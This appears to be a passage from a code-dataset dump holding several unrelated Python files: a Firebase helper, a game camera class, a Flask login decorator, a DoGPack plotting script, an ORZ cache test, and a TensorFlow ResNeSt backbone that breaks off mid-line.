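env['wsgi.input'].read(request_body_size)\n #\n # Hedged usage sketch for the Singleton-backed Common class above (these calls\n # mirror ones made elsewhere in this module, e.g. in check_user_exist below):\n #\n # db_con = Common().get_con() # first call builds the firebase connection\n # assert Common() is Common() # the metaclass always returns the same instance\n #\n # (continuation of the commented-out parse_vars body:)\n # request_body = 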
env['wsgi.input'].read(request_body_size)\n # return parse_qs(request_body)\n\n\ndef check_user_exist(phone=None):\n \"\"\" Check if the phone number exists under users/active \"\"\"\n current_app.logger.debug('common, check_user_exist: user-{0}'.format(phone))\n if phone is None:# if the posted phone is None, take the phone from the session\n phone = get_user_from_session()\n db_con = Common().get_con()\n phones = [x.key() for x in db_con.child('users', 'active').get().each()]\n return str(phone) in phones\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335719698","text":"#Completely independent module used for moving the screen (showing a bigger area than fits in a single window)\n#Provides scrolling and relative object drawing\n\nclass Camera(): #Camera, stores the point from which the player is looking\n def __init__(self,x,y,screen_size):\n self.x = x #must be positive\n self.y = y #must be positive\n self.screen_size = screen_size #necessary to check visibility of rectangles (rects)\n \n def check_rect_visibility(self,position,size): #This function checks the visibility of a rect\n x,y = position #splits position into 2 variables\n w,l = size #splits size into width and length\n if x+w >= self.x and x <= self.x + self.screen_size[0] and y+l >= self.y and y <= self.y + self.screen_size[1]:\n return True #returns True if the rectangle is visible\n return False\n","sub_path":"Game_folder/Core/simple_modules/moduleCamera.py","file_name":"moduleCamera.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397805052","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'byb'\n\n\"\"\"\n@version: python2.7\n@author: ‘byb‘\n@license: Apache Licence \n@contact: baiyibing@gmail.com\n@site: \n@software: PyCharm\n@file: decorator.py\n@time: 2016/9/11 20:15\n\"\"\"\n\n\nfrom flask import Flask, request, jsonify, g, render_template, redirect, url_for, session, current_app\nfrom functools import wraps\n\n\ndef login_check(f):\n @wraps(f)\n def decorator(*args, **kwargs):\n token = request.headers.get('token')\n if not token:\n return jsonify({'code': 0, 'message': 'authentication required'})\n\n phone_number = current_app.redis.get('token:%s' % token)\n if not phone_number or token != current_app.redis.hget('user:%s' % phone_number, 'token'):\n return jsonify({'code': 2, 'message': 'invalid authentication credentials'})\n\n return f(*args, **kwargs)\n return decorator","sub_path":"app/api_1_2/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"335177599","text":"## ------------------------------------------------------------------------- ##\ndef plotdog1(points_per_dir=1, output_directory=\"output\", point_type=1, q_name=\"a\", aux_name=\"a\", plotq1_name=\"plotq1\" ):\n \"\"\"Generic code for 1D plotting in DoGPack with matplotlib.\n\nExecute via\n\n $ python $DOGPACK/viz/python/plotdog1.py\n\nfrom an application directory. 
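A typical invocation with explicit options might be\n\n $ python $DOGPACK/viz/python/plotdog1.py -p 3 -o output\n\n(the -p/--points-per-dir and -o/--output-directory flags are defined by parse_input\nat the bottom of this file; the values shown here are purely illustrative). 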
For help type\n\n $ python $DOGPACK/viz/python/plotdog1.py -h\n \nto see a list of options.\n\nParameters:\n----------\n\n points_per_dir = points per direction (spatial dimension)\n\n output_directory = location of output directory\n\n point_type = 1: uniform points on each element ( Default )\n = 2: Gauss-Legendre points on each element\n\n q_name = name of variable filename (i.e., [q_name]0000.dat, [q_name]0001.dat, ...)\n\n aux_name = name of aux variable filename (i.e., [aux_name]0000.dat, [aux_name]0001.dat, ...)\n \n plotq1_name = name of file for additional ploting options (i.e.,\n filename is [plotq1_name].py). Given that each\n application needs to define limits for axes, color\n options, etc., this is the single hook an application has\n to set additional options. Typically, this is done\n through a single call to plotq1.py.\n\nSee also: plotdog2.py and plotdog3.py for 2- and 3D plotting routines.\n\"\"\"\n\n import os\n import sys\n import numpy as np\n import matplotlib.pyplot as plt\n from helper1 import SampleBasis1\n from helper1 import read_qfile\n\n from parse_parameters import parse_ini_parameters #.ini parser\n \n TF = os.path.exists( output_directory )\n if TF==False:\n print(\"\\n Directory not found, output_directory = %s\\n\" % output_directory )\n exit()\n\n curr_dir = os.path.abspath(\"./\")\n sys.path.append(curr_dir)\n plotq1_file = os.path.abspath(\"\".join((plotq1_name,\".py\")))\n local_plotq1 = os.path.exists(plotq1_file)\n if local_plotq1==False:\n from plotq1_default import plotq1\n else:\n #from plotq1 import plotq1\n plotq1 = getattr(__import__(plotq1_name, fromlist=[\"plotq1\"]), \"plotq1\")\n\n ini_params = parse_ini_parameters( output_directory+'/parameters.ini' )\n #print('ini_params = ', ini_params)\n GridType = ini_params['mesh_type']\n meqn = ini_params['meqn']\n maux = ini_params['maux']\n nplot = ini_params['nout']\n space_order = ini_params['space_order']\n datafmt = ini_params['datafmt']\n mx = ini_params['mx']\n xlow = ini_params['xlow']\n xhigh = ini_params['xhigh']\n\n\n# params = np.zeros(8, dtype=np.float64) \n# GridType = read_params(output_directory,params,qhelpname) \n# meqn = int(params[0])\n# maux = int(params[1])\n# nplot = int(params[2])\n# space_order = int(params[3])\n# datafmt = int(params[4])\n# mx = int(params[5])\n# xlow = params[6]\n# xhigh = params[7]\n\n print(\"\")\n print(\" GridType = %s\" % GridType )\n print(\" points_per_dir = %s\" % points_per_dir )\n print(\" point_type = %s\" % point_type )\n print(\" output_directory = %s \" % output_directory )\n print(\" q_name = %s\" % q_name )\n print(\" aux_name = %s\" % aux_name )\n print(\" plotq1_name = %s\" % plotq1_name )\n print(\"\")\n\n # Grid information\n mx_old = mx\n mx = mx*points_per_dir\n dx_old = (xhigh-xlow)/np.float64(mx_old)\n dx = (xhigh-xlow)/np.float64(mx)\n\n # Construct point values on entire grid\n if( point_type == 1 ):\n\n # Location of points on Canonical element\n ds = 2.0 / (1 + points_per_dir )\n \n s1d = np.linspace( -1.+ds, 1.-ds, num=points_per_dir )\n \n # Cell centers\n xc = np.linspace( xlow+0.5*dx, xhigh-0.5*dx, mx )\n\n xc_old = np.zeros(mx_old, dtype=np.float64 )\n xc_old[0] = xlow + 0.5*dx_old\n for i in range(1, mx_old):\n xc_old[i] = xc_old[i-1] + dx_old\n\n else:\n\n # Accessors\n sq3, sq5, sq7 = ( np.sqrt(3.), np.sqrt(5.), np.sqrt(7.) )\n \n # quadrautre points (TODO - add in 6th order story ... 
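)\n #\n # Hedged cross-check, not part of the original script: the hard-coded nodes below\n # agree with numpy's Gauss-Legendre rule; e.g. for three points,\n #\n # nodes, weights = np.polynomial.legendre.leggauss(3)\n #\n # returns nodes ~ [-0.7745967, 0.0, 0.7745967], i.e. [-sqrt(3/5), 0, sqrt(3/5)],\n # matching the points_per_dir==3 entry.\n 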
if(points_per_dir==1):\n s1d = np.array( [0.0] )\n elif(points_per_dir==2):\n s1d = np.array( [-1.0/sq3, 1.0/sq3] )\n elif(points_per_dir==3):\n s1d = np.array( [-sq3/sq5, 0.0e0, sq3/sq5] )\n elif(points_per_dir==4):\n s1d = np.array( [-np.sqrt(3.0+np.sqrt(4.8))/sq7, -np.sqrt(3.0-np.sqrt(4.8))/sq7, np.sqrt(3.0-np.sqrt(4.8))/sq7, np.sqrt(3.0+np.sqrt(4.8))/sq7] )\n elif(points_per_dir==5):\n s1d = np.array( [-np.sqrt(5.0 + np.sqrt(40.0/7.0))/3.0,\n -np.sqrt(5.0 - np.sqrt(40.0/7.0))/3.0,\n 0.0,\n np.sqrt(5.0 - np.sqrt(40.0/7.0))/3.0,\n np.sqrt(5.0 + np.sqrt(40.0/7.0))/3.0] )\n\n xc = np.zeros( mx_old*points_per_dir, dtype=np.float64 )\n xline = np.linspace( xlow, xhigh, mx_old+1 ) # cell edges\n\n kk = 0\n for i in range( mx_old ):\n for k3 in range( kk, kk+points_per_dir ):\n xc[ k3 ] = xline[i]+(dx_old/2.)*(s1d[k3-kk]+1.0)\n kk = kk + points_per_dir\n\n ## --------------------------------------------------------------------- ##\n # Sample basis functions on mesh\n # size of phi = (points_per_dir, space_order)\n ## --------------------------------------------------------------------- ##\n phi = SampleBasis1(s1d, space_order )\n\n tmp1 = \"\".join((\" Which component of q do you want to plot ( 1 - \",str(meqn)))\n tmp2 = \"\".join((tmp1,\" ) ? \"))\n m = raw_input(tmp2)\n print(\"\")\n if (not m):\n m = 1\n else:\n m = int(m)\n\n if(m<1):\n print(\"\")\n print(\" Error, need m >= 1, m = %d\" % m )\n print(\"\")\n exit(1)\n elif(m>meqn): \n print(\"\")\n print(\" Error, need m <= %d, m = %d \" % (meqn, m ) )\n print(\"\")\n exit(1)\n\n nf = 0 # Frame number\n n1 = -1 # Frame number\n\n plt.ion()\n while (nf!=-1):\n tmp1 = \"\".join((\" Plot which frame ( 0 - \",str(nplot)))\n tmp2 = \"\".join((tmp1,\" ) [type -1 or type 'quit' to quit] ? 
\"))\n nf = raw_input(tmp2)\n if(not nf):\n n1 = n1 + 1\n nf = 0\n elif(nf==\"quit\" or nf==\"q\"):\n nf = -1\n else:\n nf = int(nf)\n n1 = nf\n\n if( n1 > nplot ):\n print(\"\")\n print(\" End of plots \" )\n print(\"\")\n n1 = nplot\n\n if( nf != -1 ):\n\n ## ------------------------------------------------------------------------- ##\n # Solution -- q\n # solution should be found in file\n # output_directory/q[n1].dat\n ## ------------------------------------------------------------------------- ##\n\n\n # Q-file name (with directory thrown in the mix)\n qfile = output_directory + \"/\" + q_name + \"%04d\" % n1 + \".dat\"\n\n # Read in the coefficients from file\n mtmp = mx_old*meqn*space_order\n time, qtmp = read_qfile(mtmp, qfile )\n qcoeffs = np.reshape(qtmp,(space_order,meqn,mx_old))\n\n # Evaluate the basis functions\n qsoln = np.zeros((mx,meqn), dtype=np.float64)\n v1 = np.zeros(space_order, dtype=np.float64)\n v2 = np.zeros(space_order, dtype=np.float64)\n for i in range(1,mx_old+1):\n for me in range(1,meqn+1):\n for ii in range(1,points_per_dir+1):\n v1[:] = phi[ii-1,:]\n v2[:] = qcoeffs[:,me-1,i-1]\n tmp = 0.0\n for k in range(0,space_order):\n tmp = tmp + v1[k]*v2[k]\n qsoln[(i-1)*points_per_dir+ii-1,me-1] = tmp\n\n ## ------------------------------------------------------------------------- ##\n # Aux arrays -- aux\n # solution should be found in file\n # output_directory/aux_name[n1].dat\n ## ------------------------------------------------------------------------- ##\n if( maux > 0):\n\n # Auxiliary file name (with directory thrown in the mix)\n afile = output_directory + \"/\" + aux_name + \"%04d\" % n1 + \".dat\"\n\n # Read in the coefficients from file\n mtmp = mx_old*maux*space_order\n time, atmp = read_qfile(mtmp, afile)\n acoeffs = np.reshape(atmp, (space_order,maux,mx_old) )\n\n # Evaluate the coefficients\n auxsoln = np.zeros((mx,maux), dtype=np.float64)\n v1 = np.zeros(space_order, dtype=np.float64)\n v2 = np.zeros(space_order, dtype=np.float64)\n for i in range(1,mx_old+1):\n for me in range(1,maux+1):\n for ii in range(1,points_per_dir+1):\n v1[:] = phi[ii-1,:]\n v2[:] = acoeffs[:,me-1,i-1]\n tmp = 0.0\n for k in range(0,space_order):\n tmp = tmp + v1[k]*v2[k]\n auxsoln[(i-1)*points_per_dir+ii-1,me-1] = tmp\n else:\n auxsoln = False\n\n ###################################################################\n #\n # USER SUPPLIED FUNCTION (or default function )\n #\n # This is your one single hook into the code for adding extra\n # information you would like to plot.\n #\n ###################################################################\n plotq1(m-1, space_order, meqn, mx, time, xc, qsoln, auxsoln)\n\n plt.ioff()\n print(\"\")\n## ------------------------------------------------------------------------- ##\n \n\n## ------------------------------------------------------------------------- ##\ndef parse_input( help_message ):\n \"\"\"Parse command line arguments for 1D plotting routines.\"\"\"\n\n import argparse, sys\n\n parser = argparse.ArgumentParser (\n prog = 'python '+ sys.argv[0],\n description = help_message,\n formatter_class = argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument('-p', '--points-per-dir', \n type = int, \n default = 1, \n help =\n'''Number of points per cell to be plotted.\n(default: 1)''')\n\n parser.add_argument('-o', '--output-directory', \n type = str, \n default = 'output', \n help =\n'''Location of the output directory where coefficients can be located.\n(default: output)''')\n\n parser.add_argument('-t', '--point-type', \n 
type = int, \n default = 1, \n help =\n'''Type of points to be plotted. \n point-type==1: Linearly spaced.\n point-type==2: Gauss-Legendre.\n(default: 1)''')\n\n parser.add_argument( '-q', '--q-name', type = str, default='q', \n help =\n'''Name of variable used in the filename. In most routines this is 'q' but in some cases\none may wish to save additional data. For example, a 2D code may want to save\n1D data objects, and then plot them.\n(default: q).''')\n\n parser.add_argument( '-x', '--aux-name', type = str, default='a', \n help =\n'''Name of aux variable used in the filename. In most routines this is 'a' but in some cases\none may wish to save additional data. For example, a 2D code may want to save\n1D data objects, and then plot them.\n(default: a).''')\n\n parser.add_argument( '-a', '--plotq1-name', \n type = str, \n default = 'plotq1', \n help =\n'''filename for file with additional plotting options.\n(default: plotq1)''')\n\n return parser.parse_args()\n#----------------------------------------------------------\n\nif __name__== '__main__':\n \"\"\"Main python plotting routine for 1D simulations in DoGPack.\n\n When run from the command line, this script parses user supplied command\n line arguments, if any, and then executes plotdog1. To see a list of\n options, type \n\n python $DOGPACK/viz/python/plotq1.py -h\n\n \"\"\"\n\n # Parse input arguments\n args = parse_input( plotdog1.__doc__ )\n #print(args)\n #print('')\n\n # Call the main 1D plotting routine\n plotdog1(args.points_per_dir, args.output_directory, args.point_type, args.q_name, args.aux_name, args.plotq1_name )\n","sub_path":"dogpack-developer/viz/python/plotdog1.py","file_name":"plotdog1.py","file_ext":"py","file_size_in_byte":12687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65990798","text":"from unittest import TestCase, skip\n\nfrom .env_init import store, mc, initted\nfrom ORZ.exports import OrzBase, OrzField, orz_get_multi, OrzPrimaryField, setup as setup_orz\n\nclass MCDetector(object):\n def __init__(self, mc):\n self.mc = mc\n self.hitted = False\n\n def get(self, key):\n ret = self.mc.get(key)\n self.hitted = (ret is not None)\n return ret\n\n\n def __getattr__(self, attr):\n return getattr(self.mc, attr)\n\nmcd = MCDetector(mc)\nsetup_orz(store, mcd)\n\nclass Dummy(OrzBase):\n __orz_table__ = 'test_orz'\n\n subject_id = OrzField(as_key=OrzField.KeyType.ASC)\n ep_num = OrzField(as_key=OrzField.KeyType.ASC, default=0)\n content = OrzField(default='hello world')\n\nclass TestCache(TestCase):\n def setUp(self):\n cursor = store.get_cursor()\n cursor.execute('''DROP TABLE IF EXISTS `test_orz`''')\n cursor.delete_without_where = True\n cursor.execute('''\n CREATE TABLE `test_orz`\n ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n `subject_id` int(10) unsigned NOT NULL,\n `ep_num` int(10) unsigned NOT NULL,\n `content` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_subject` (`subject_id`, `ep_num`, `id`)) ENGINE=MEMORY AUTO_INCREMENT=1''')\n\n def tearDown(self):\n store.get_cursor().execute('truncate table `test_orz`')\n mc.clear()\n\n def test_invalidation(self):\n def run_pred(cond_and_pred):\n for cond, pred in cond_and_pred:\n Dummy.gets_by(**cond)\n self.assertEqual(mcd.hitted, pred)\n\n cond_all = dict(subject_id=1, ep_num=1)\n cond_1 = dict(subject_id=1)\n d = Dummy.create(**cond_all)\n before = (\n (cond_all, False),\n (cond_all, True),\n (cond_1, False),\n (cond_1, True),\n )\n\n after = (\n (cond_all, False),\n (cond_1, False),\n 
)\n\n run_pred(before)\n d.invalidate_cache()\n run_pred(after)\n\n mcd.clear()\n\n run_pred(before)\n Dummy.invalidate_cache_by_condition(**cond_all)\n run_pred(after)\n\n","sub_path":"tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510999866","text":"\"\"\"Contains definition of ResNest\nAdapted from https://github.com/QiaoranC/tf_ResNeSt_RegNet_model\nSee https://arxiv.org/pdf/2004.08955.pdf\n\"\"\"\n\nimport tensorflow as tf\n\nfrom official.modeling import hyperparams\nfrom tensorflow.keras import models\nfrom tensorflow.keras.activations import softmax\nfrom tensorflow.keras.utils import get_custom_objects\nfrom tensorflow.keras.layers import (\n Activation,\n Add,\n AveragePooling2D,\n BatchNormalization,\n Conv2D,\n Dense,\n Dropout,\n GlobalAveragePooling2D,\n Input,\n InputSpec,\n MaxPool2D,\n UpSampling2D,\n)\n\nfrom official.modeling import tf_utils\nfrom official.vision.beta.modeling.backbones import factory\n\nRESNEST_SPECS = {\n 50: {\n 'blocks_set': [3,4,6,3],\n 'stem_width': 32,\n },\n 101: {\n 'blocks_set': [3,4,23,3],\n 'stem_width': 64,\n },\n 200: {\n 'blocks_set': [3,24,36,3],\n 'stem_width': 64,\n },\n 269: {\n 'blocks_set': [3,30,48,8],\n 'stem_width': 64,\n },\n}\n\n\ndef get_flops(model):\n run_meta = tf.compat.v1.RunMetadata()\n opts = tf.compat.v1.profiler.ProfileOptionBuilder.float_operation()\n\n # We use the Keras session graph in the call to the profiler.\n flops = tf.compat.v1.profiler.profile(\n graph=tf.compat.v1.keras.backend.get_session().graph, run_meta=run_meta, cmd=\"op\", options=opts\n )\n\n return flops.total_float_ops # Total float ops (\"flops\") of the model.\n\n\nclass Mish(Activation):\n \"\"\"\n based on https://github.com/digantamisra98/Mish/blob/master/Mish/TFKeras/mish.py\n Mish Activation Function.\n \"\"\"\n\n def __init__(self, activation, **kwargs):\n super(Mish, self).__init__(activation, **kwargs)\n self.__name__ = \"Mish\"\n\n\ndef mish(inputs):\n # with tf.device(\"CPU:0\"):\n result = inputs * tf.math.tanh(tf.math.softplus(inputs))\n return result\n\n\nclass GroupedConv2D(object):\n \"\"\"Grouped convolution.\n https://github.com/tensorflow/tpu/blob/master/models/official/mnasnet/mixnet/custom_py\n Currently tf.keras and tf.layers don't support group convolution, so here we\n use split/concat to implement this op. It reuses kernel_size for group\n definition, where len(kernel_size) is number of groups. Notably, it allows\n different groups to have different kernel sizes.\n \"\"\"\n\n def __init__(self, filters, kernel_size, use_keras=True, **kwargs):\n \"\"\"Initialize the layer.\n Args:\n filters: Integer, the dimensionality of the output space.\n kernel_size: An integer or a list. If it is a single integer, then it is\n same as the original Conv2D. 
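For example (hypothetical\n shapes), kernel_size=[3, 5] creates two groups, one with 3x3 and one with\n 5x5 kernels; the split and concat happen inside __call__:\n\n conv = GroupedConv2D(filters=32, kernel_size=[3, 5], padding=\"same\")\n y = conv(tf.random.normal([1, 8, 8, 16])) # y has shape [1, 8, 8, 32]\n\n 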
If it is a list, then we split the channels\n and perform different kernel for each group.\n use_keras: An boolean value, whether to use keras layer.\n **kwargs: other parameters passed to the original conv2d layer.\n \"\"\"\n self._groups = len(kernel_size)\n self._channel_axis = -1\n\n self._convs = []\n splits = self._split_channels(filters, self._groups)\n for i in range(self._groups):\n self._convs.append(self._get_conv2d(splits[i], kernel_size[i], use_keras, **kwargs))\n\n def _get_conv2d(self, filters, kernel_size, use_keras, **kwargs):\n \"\"\"A helper function to create Conv2D layer.\"\"\"\n if use_keras:\n return Conv2D(filters=filters, kernel_size=kernel_size, **kwargs)\n else:\n return Conv2D(filters=filters, kernel_size=kernel_size, **kwargs)\n\n def _split_channels(self, total_filters, num_groups):\n split = [total_filters // num_groups for _ in range(num_groups)]\n split[0] += total_filters - sum(split)\n return split\n\n def __call__(self, inputs):\n if len(self._convs) == 1:\n return self._convs[0](inputs)\n\n if tf.__version__ < \"2.0.0\":\n filters = inputs.shape[self._channel_axis].value\n else:\n filters = inputs.shape[self._channel_axis]\n splits = self._split_channels(filters, len(self._convs))\n x_splits = tf.split(inputs, splits, self._channel_axis)\n x_outputs = [c(x) for x, c in zip(x_splits, self._convs)]\n x = tf.concat(x_outputs, self._channel_axis)\n return x\n\n\n@tf.keras.utils.register_keras_serializable(package='Vision')\nclass ResNest(tf.keras.Model):\n def __init__(self, \n model_id,\n input_specs=InputSpec(shape=[None, None, None, 3]),\n stem_type='v1',\n activation=\"relu\",\n dropout_rate=0.2,\n radix=2, \n groups=1,\n bottleneck_width=64, \n block_expansion=4, \n avg_down=True,\n avd=True, \n avd_first=False, \n preact=False, \n using_basic_block=False,\n using_cb=False):\n self.channel_axis = -1 # not for change\n self.model_id = model_id\n self.activation = activation\n self.input_specs = input_specs\n self.dropout_rate = dropout_rate\n\n self.blocks_set = RESNEST_SPECS[model_id]['blocks_set']\n self.radix = radix\n self.cardinality = groups\n self.bottleneck_width = bottleneck_width\n\n self.deep_stem = stem_type == 'v1'\n self.stem_width = RESNEST_SPECS[model_id]['stem_width']\n self.block_expansion = block_expansion\n self.avg_down = avg_down\n self.avd = avd\n self.avd_first = avd_first\n\n self.dilation = 1\n self.preact = preact\n self.using_basic_block = using_basic_block\n self.using_cb = using_cb\n\n # get_custom_objects().update({'mish': Mish(mish)})\n\n input_sig = Input(shape=self.input_specs.shape[1:])\n x = self._make_stem(input_sig, stem_width=self.stem_width, deep_stem=self.deep_stem)\n\n if self.preact is False:\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n print(\"stem_out\", x.shape)\n\n x = MaxPool2D(pool_size=3, strides=2, padding=\"same\", data_format=\"channels_last\")(x)\n print(\"MaxPool2D out\", x.shape)\n\n if self.preact is True:\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n \n endpoints = {}\n i = 0\n if self.using_cb:\n second_x = x\n second_x = self._make_layer(x, blocks=self.blocks_set[0], filters=64, stride=1, is_first=False)\n second_x_tmp = self._make_Composite_layer(second_x,filters=x.shape[-1],upsample=False)\n print('layer 0 db_com',second_x_tmp.shape)\n x = Add()([second_x_tmp, x])\n x = self._make_layer(x, blocks=self.blocks_set[0], filters=64, stride=1, 
is_first=False)\n endpoints[str(i + 2)] = x\n print(\"-\" * 5, \"layer 0 out\", x.shape, \"-\" * 5)\n\n b1_b3_filters = [64,128,256,512]\n for i in range(1, 4):\n if self.using_cb:\n second_x = self._make_layer(x, blocks=self.blocks_set[i], filters=b1_b3_filters[i], stride=2)\n second_x_tmp = self._make_Composite_layer(second_x,filters=x.shape[-1])\n print('layer {} db_com out {}'.format(i,second_x_tmp.shape))\n x = Add()([second_x_tmp, x])\n x = self._make_layer(x, blocks=self.blocks_set[i], filters=b1_b3_filters[i], stride=2)\n print('----- layer {} out {} -----'.format(i,x.shape))\n endpoints[str(i + 2)] = x\n \n self._output_specs = {l: endpoints[l].get_shape() for l in endpoints}\n print(self._output_specs)\n\n super(ResNest, self).__init__(inputs=input_sig, outputs=endpoints)\n\n def _make_stem(self, input_tensor, stem_width=64, deep_stem=False):\n x = input_tensor\n if deep_stem:\n x = Conv2D(stem_width, kernel_size=3, strides=2, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n x = Conv2D(stem_width, kernel_size=3, strides=1, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n x = Conv2D(stem_width * 2, kernel_size=3, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n\n # x = BatchNormalization(axis=self.channel_axis,epsilon=1.001e-5)(x)\n # x = tf_utils.get_activation(self.activation)(x)\n else:\n x = Conv2D(stem_width, kernel_size=7, strides=2, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(x)\n # x = BatchNormalization(axis=self.channel_axis,epsilon=1.001e-5)(x)\n # x = tf_utils.get_activation(self.activation)(x)\n return x\n\n def _rsoftmax(self, input_tensor, filters, radix, groups):\n x = input_tensor\n batch = x.shape[0]\n if radix > 1:\n x = tf.reshape(x, [-1, groups, radix, filters // groups])\n x = tf.transpose(x, [0, 2, 1, 3])\n x = tf.keras.activations.softmax(x, axis=1)\n x = tf.reshape(x, [-1, 1, 1, radix * filters])\n else:\n x = Activation(\"sigmoid\")(x)\n return x\n\n def _SplAtConv2d(self, input_tensor, filters=64, kernel_size=3, stride=1, dilation=1, groups=1, radix=0):\n x = input_tensor\n in_channels = input_tensor.shape[-1]\n\n x = GroupedConv2D(filters=filters * radix, kernel_size=[kernel_size for i in range(groups * radix)],\n use_keras=True, padding=\"same\", kernel_initializer=\"he_normal\", use_bias=False,\n data_format=\"channels_last\", dilation_rate=dilation)(x)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n batch, rchannel = x.shape[0], x.shape[-1]\n if radix > 1:\n splited = tf.split(x, radix, axis=-1)\n gap = sum(splited)\n else:\n gap = x\n\n # print('sum',gap.shape)\n gap = GlobalAveragePooling2D(data_format=\"channels_last\")(gap)\n gap = tf.reshape(gap, [-1, 1, 1, filters])\n # print('adaptive_avg_pool2d',gap.shape)\n\n reduction_factor = 4\n inter_channels = max(in_channels * radix // reduction_factor, 32)\n\n x = Conv2D(inter_channels, kernel_size=1)(gap)\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n x = Conv2D(filters 
* radix, kernel_size=1)(x)\n\n atten = self._rsoftmax(x, filters, radix, groups)\n\n if radix > 1:\n logits = tf.split(atten, radix, axis=-1)\n out = sum([a * b for a, b in zip(splited, logits)])\n else:\n out = atten * x\n return out\n\n def _make_block(\n self, input_tensor, first_block=True, filters=64, stride=2, radix=1, avd=False, avd_first=False, is_first=False\n ):\n x = input_tensor\n inplanes = input_tensor.shape[-1]\n if stride != 1 or inplanes != filters * self.block_expansion:\n short_cut = input_tensor\n if self.avg_down:\n if self.dilation == 1:\n short_cut = AveragePooling2D(pool_size=stride, strides=stride, padding=\"same\", data_format=\"channels_last\")(\n short_cut\n )\n else:\n short_cut = AveragePooling2D(pool_size=1, strides=1, padding=\"same\", data_format=\"channels_last\")(short_cut)\n short_cut = Conv2D(filters * self.block_expansion, kernel_size=1, strides=1, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(short_cut)\n else:\n short_cut = Conv2D(filters * self.block_expansion, kernel_size=1, strides=stride, padding=\"same\",\n kernel_initializer=\"he_normal\", use_bias=False, data_format=\"channels_last\")(short_cut)\n\n short_cut = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(short_cut)\n else:\n short_cut = input_tensor\n # should the above be in make layer?\n # see https://github.com/zhanghang1989/ResNeSt/blob/master/resnest/torch/resnet.py\n\n group_width = int(filters * (self.bottleneck_width / 64.0)) * self.cardinality\n x = Conv2D(group_width, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\", use_bias=False,\n data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n avd = avd and (stride > 1 or is_first)\n\n if avd:\n avd_layer = AveragePooling2D(pool_size=3, strides=stride, padding=\"same\", data_format=\"channels_last\")\n stride = 1\n\n if avd and avd_first:\n x = avd_layer(x)\n\n if radix >= 1:\n x = self._SplAtConv2d(x, filters=group_width, kernel_size=3, stride=stride, dilation=self.dilation,\n groups=self.cardinality, radix=radix)\n else:\n x = Conv2D(group_width, kernel_size=3, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n if avd and not avd_first:\n x = avd_layer(x)\n # print('can')\n x = Conv2D(filters * self.block_expansion, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n\n m2 = Add()([x, short_cut])\n m2 = tf_utils.get_activation(self.activation)(m2)\n return m2\n\n def _make_block_basic(\n self, input_tensor, first_block=True, filters=64, stride=2, radix=1, avd=False, avd_first=False, is_first=False\n ):\n \"\"\"Conv2d_BN_Relu->Bn_Relu_Conv2d\n \"\"\"\n x = input_tensor\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n\n short_cut = x\n inplanes = input_tensor.shape[-1]\n if stride != 1 or inplanes != filters * self.block_expansion:\n if self.avg_down:\n if self.dilation == 1:\n short_cut = AveragePooling2D(pool_size=stride, strides=stride, padding=\"same\", 
